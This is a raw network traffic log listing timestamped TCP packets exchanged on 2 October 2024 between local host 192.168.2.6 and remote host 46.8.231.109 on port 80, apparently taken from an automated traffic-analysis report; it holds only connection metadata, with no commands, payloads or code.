                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002060890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002078056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002091885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002093077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002104998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002116919 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002156019 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002331018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002389908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002398014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002420902 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002438068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002449036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002459049 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002469063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002479076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002489090 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002516985 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002643108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002654076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002664089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002674103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002676964 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002685070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002696037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002706051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002710104 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002717018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002749920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002763987 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002769947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002793074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002825975 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002887011 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002897978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002907991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002918005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002919912 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002931118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002940893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002948999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.002974987 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082010031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082027912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082041025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082075119 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082092047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082103014 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082123995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082135916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082144976 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082153082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082155943 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082179070 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082204103 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082228899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082242012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082253933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082264900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082268953 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082278013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082287073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082290888 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082303047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082321882 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082345009 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082746983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082760096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082777023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082787037 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082804918 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082823038 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082894087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082906008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082916975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082933903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082945108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.082964897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083002090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083014965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083029032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083040953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083055973 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083055973 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083076000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083089113 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083101034 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083101034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083132982 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083148003 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083205938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083216906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083261967 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083261967 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083802938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083848953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083862066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083887100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083888054 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083925009 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083935976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083947897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083949089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083962917 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.083986044 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084012985 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084125042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084137917 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084148884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084162951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084173918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084183931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084187031 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084187031 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084197044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084209919 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084230900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084252119 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084255934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084291935 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084378958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084391117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084403038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084418058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084423065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084433079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084454060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084461927 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084474087 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.084506035 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086857080 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086908102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086908102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086920023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086941004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086946011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086954117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086966038 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086982012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.086986065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087006092 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087009907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087013006 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087035894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087080956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087786913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087800980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087811947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087821960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087837934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087846994 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087867975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087877989 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087882996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087896109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087908983 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087929964 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.087939978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088823080 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088845015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088856936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088893890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088922977 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088958979 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088970900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088982105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.088993073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089005947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089016914 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089051008 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089076996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089091063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089102983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089117050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089128017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089143991 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089169979 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089202881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089215994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089226961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089236021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089245081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089251041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089257956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089260101 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089271069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089281082 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089314938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089664936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089678049 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089689016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089699984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089710951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.089740992 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090006113 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090059996 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090061903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090075016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090097904 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090120077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090122938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090132952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090145111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090192080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090226889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090239048 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090240002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090251923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090264082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090274096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090295076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090316057 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090409040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090420961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090431929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090442896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090446949 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090456009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090466976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090477943 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090480089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090491056 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090493917 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090526104 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090665102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090677023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090687990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090698004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090698957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090712070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090713024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090723038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090735912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090743065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090747118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090751886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090774059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090779066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090796947 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.090837002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169533014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169559956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169570923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169596910 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169620991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169631958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169636965 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169646025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169657946 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169661999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169686079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.169709921 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170057058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170069933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170080900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170090914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170098066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170103073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170109034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170115948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170128107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170131922 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170142889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170203924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170203924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170456886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170468092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170480013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170509100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170536995 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170561075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170572996 CEST805851546.8.231.109192.168.2.6
